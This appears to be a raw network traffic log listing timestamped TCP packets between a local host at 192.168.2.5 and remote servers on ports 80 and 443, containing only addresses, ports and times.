                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.198713064 CET49895443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.198740005 CET4434989513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.198970079 CET49895443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.199251890 CET49895443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.199268103 CET4434989513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.377015114 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.377115011 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.377207994 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.377223969 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.377264023 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.377300978 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.377877951 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.377912998 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.377945900 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.377964973 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.378737926 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.378752947 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.378767014 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.378799915 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.378839970 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.379483938 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.379498959 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.379543066 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.379569054 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.379990101 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.380004883 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.380058050 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.381288052 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.381350994 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.489420891 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.489504099 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.489804029 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.489840984 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.489892960 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.490365982 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.490398884 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.490564108 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.491589069 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.491636992 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.491666079 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.491667986 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.491705894 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.491731882 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.496937990 CET4434988820.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.496961117 CET4434988820.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.497221947 CET49888443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.497241020 CET4434988820.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.497500896 CET49888443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.497515917 CET4434988820.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.497524977 CET49888443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.497802973 CET4434988820.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.497883081 CET4434988820.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.497948885 CET49888443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.500632048 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.500708103 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.500838041 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.500870943 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.500883102 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.500962973 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.500977039 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.501279116 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.501311064 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.501344919 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.501358986 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.501391888 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.502698898 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.502732992 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.502765894 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.502799034 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.502819061 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.502844095 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.503182888 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.503216028 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.503248930 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.503285885 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.503318071 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.504826069 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.504861116 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.504897118 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.504919052 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.504919052 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.504939079 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.505844116 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.505875111 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.505963087 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.505963087 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.532721043 CET49896443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.532758951 CET4434989620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.532840014 CET49896443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.533334970 CET49896443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.533351898 CET4434989620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.560228109 CET49897443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.560247898 CET4434989720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.560502052 CET49897443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.560656071 CET49897443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.560667992 CET4434989720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.601330996 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.601383924 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.601401091 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.601413965 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.601458073 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.601625919 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.601659060 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.601712942 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.603085995 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.603136063 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.614706993 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.614772081 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.614805937 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.614859104 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.615041018 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.615072966 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.615092039 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.615123987 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.615942001 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.615977049 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.615992069 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.616106987 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.616415977 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.616467953 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.624165058 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.624351025 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.624366999 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.624386072 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.624428034 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.625055075 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.625087976 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.625104904 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.625142097 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.625659943 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.625875950 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.626859903 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.626893044 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.626925945 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.626957893 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.626959085 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.626975060 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.627000093 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.627705097 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.627754927 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.627882004 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.628407001 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.628457069 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.628465891 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.628488064 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.628525019 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.629090071 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.629125118 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.629143953 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.629173040 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.629796982 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.629831076 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.629864931 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.629892111 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.629919052 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.664949894 CET4434989213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.665560961 CET49892443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.665579081 CET4434989213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.665999889 CET49892443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.666003942 CET4434989213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.724986076 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.725121021 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.725130081 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.725156069 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.725194931 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.725567102 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.725600958 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.725617886 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.726429939 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.726607084 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.730216980 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.737973928 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.738076925 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.738140106 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.738173008 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.738182068 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.738266945 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.738629103 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.738662958 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.738676071 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.738699913 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.739391088 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.739423990 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.739527941 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.739937067 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.739991903 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.747612953 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.747688055 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.747690916 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.747703075 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.747726917 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.747751951 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.748253107 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.748267889 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.748315096 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.749923944 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.749984980 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.750071049 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.750113010 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.751729965 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.751744986 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.751759052 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.751773119 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.751789093 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.751821041 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.751909018 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.751925945 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.751939058 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.751954079 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.751959085 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.751969099 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.751971960 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.752002001 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.752023935 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.752048969 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.752063990 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.752078056 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.752093077 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.752105951 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.752134085 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.752634048 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.752650023 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.752676964 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.752701998 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.752990007 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.753041983 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.801769018 CET4434989213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.801793098 CET4434989213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.801841974 CET49892443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.801857948 CET4434989213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.801927090 CET4434989213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.802020073 CET49892443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.802125931 CET49892443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.802136898 CET4434989213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.802145958 CET49892443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.802150011 CET4434989213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.805176020 CET49898443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.805277109 CET4434989813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.805367947 CET49898443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.805515051 CET49898443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.805546045 CET4434989813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.848344088 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.848429918 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.848720074 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.848733902 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.848795891 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.848910093 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.848926067 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.848968029 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.849622965 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.849689007 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.862402916 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.862467051 CET4987580192.168.2.577.83.175.105
